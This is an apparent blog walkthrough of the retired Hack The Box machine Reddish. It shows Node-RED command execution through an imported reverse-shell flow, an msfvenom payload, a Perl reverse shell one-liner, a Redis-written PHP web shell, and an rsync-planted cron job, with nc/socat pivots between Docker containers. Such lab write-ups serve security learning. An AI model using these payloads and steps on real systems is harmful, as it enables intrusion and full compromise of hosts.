This post documents the complete walkthrough of Reddish, a retired vulnerable VM created by yuntao, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


Reddish is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt
1880/tcp open  http    syn-ack ttl 62 Node.js Express framework
|_http-favicon: Unknown favicon MD5: 818DD6AFD0D0F9433B21774F89665EEA
| http-methods:
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-title: Error

Since I can’t GET, let’s try POST.


Nice! Let’s follow the hint from the output above.

Node-RED allows command execution. Import the following flow into the Node-RED and you should see something like this.

[{"id":"30fa9bc2.3414cc","type":"tcp in","z":"506564e3.6cef04","name":"","server":"client","host":"","port":"1234","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":120,"y":80,"wires":[["cc2b2fad.f52d6"]]},{"id":"4f71ce1a.fc7078","type":"tcp out","z":"506564e3.6cef04","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":650,"y":80,"wires":[]},{"id":"cc2b2fad.f52d6","type":"exec","z":"506564e3.6cef04","command":"/bin/bash -c","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":410,"y":160,"wires":[["4f71ce1a.fc7078"],["4f71ce1a.fc7078"],[]]}]

Here, I’m running a reverse shell flow, executing /bin/bash -c and returning stdout and stderr to myself. And, because it’s running under the context of /bin/bash -c, commands with space has to be enclosed in quotes.

Bummer, I know.

That’s why I spun off another reverse shell with msfvenom.

# msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=9999 -f elf -o rev

Next, I’ve to find a more efficient way of transferring files over to the remote target. To that end, I wrote a wget utility in Node.js since node and the request modules are available. The script has two arguments: the first argument is the download URL and the second argument is the path to save the file.

const fs = require('fs');
const request = require('request');

var args = process.argv.slice(2);
var url = args[0];
var location = args[1];


Long story short, I transferred over the base64-encoded string of the wget.js and reverse the process like so.

Now that I’ve a better shell and have root; only to realize that Node-RED is running inside a Docker container!

Exploring the docker container, I realized that there might be other containers around!

Look at My first guess is that there are probably two containers on and respectively because is likely the host.

And because the docker container is lacking in the network reconnaissance department, I’d to transfer nc to act as a no-frills port scanner, leveraging on the zero I/O mode in nc.

With nc, I can perform rudimentary port scans to my liking.

Next, let’s transfer over Dropbear SSH client, dbclient, a drop-in replacement SSH client with a small footprint. The dbclient allows us to forward remote ports to my attacking machine via the SSH tunnel. The instruction to statically compile dbclient is beyond the scope of this write-up.

While we are at it, let’s transfer a statically compiled socat as well. Now, start the SSH server on my attacking machine. Note that I’ve allowed root login with PermitRootLogin yes.

# systemctl start ssh

Forward the remote ports to my attacking machine like so.

# ssh -R [email protected] -f -N
# ssh -R [email protected] -f -N

Now, I can access these docker containers!

Next Container: www

Looks like we have hints in the HTML source.

If I have to guess, I would say that the www container and the redis container are sharing /var/www/html. Another piece of technology that will aid us is PHP.

If that’s the case, then I can do something like this since I also have access to the redis container:

  1. Set dir to /var/www/html.
  2. Set dbfilename to cmd.php.
  3. Set a key with PHP code to allows remote command execution.
  4. Save the snapshot.

Awesome. It works!

I prefer to use Perl as the reverse shell because it’s always available, even in containers. :grin:

Before we do that, we need to set up another a TCP tunnel between nodered and my attacking machine to facilitate data shuffling between the www container and my attacking machine.

This is how the Perl reverse shell looks like before URL encoding:

perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Encode it to prevent complications.


We have shell into www!

Next Container: backup

We’ll soon realize that www is another multi-homed container.

It’s getting familiar now. Another container probably lives at Suffice to say, we need to transfer our beloved nc to www to show some port scanning love to the newly discovered container.

The transfer this time round is more troublesome because the reverse shell truncates the base64-encoded string of nc. Fret not, we can gzip before encoding. Like this, we can save some space and reduce the number of times we copy-and-paste the string over in a piece-meal fashion.

It’s not pretty but hey, it works!

What do we have here?

And there’s a rysnc client in www!

During enumeration of www, I found the following locations of interest:

  • cron job at /etc/cron.d/backup
  • /dev/sda3 mounted at /home

This is how looks like.

This is how the mounts looks like.

Now I’m pretty sure getting the flags have something to do with the last container.

I’ll not go over how to use or what rsync is, that’s what the man-pages are for. RTFM!

Pivoting on how cron job is scheduled in www, I found a similar cron job in backup too.

No wonder the database backup doesn’t complete!

We know rsync works both ways. We can copy files from backup, we can also copy files over to backup. I’ve done my enumerations. :triumph:

Let’s copy two files over. Our beloved nc and another cron job that runs the nc reverse shell back to us. But before we do that, we need to set up a pair of TCP tunnels between nodered and www; and nodered and my attacking machine. If you have been following the walkthrough so far, you realized that there’s no socat in www. As such, we also need to transfer socat to www, with the help of nc, of course.

On www, use the following command

$ /tmp/nc -lnvp 1234 > /tmp/socat &

On nodered, use the following command

# nc 1234 < /usr/bin/socat &

Now we cat set up the tunnels.

On www, use the following command

$ /tmp/socat tcp-listen:5555,fork tcp: &

On nodered, use the following command

# socat tcp-listen:5555,fork tcp: &

Now, let’s copy the files over.

A minute later, you’ll receive a root shell on backup.


The backup container as the name suggests, stores the data on the host. Because of that, we can mount the host’s partitions within the container. And since we are root on this container, we can read any files from the mounted volumes.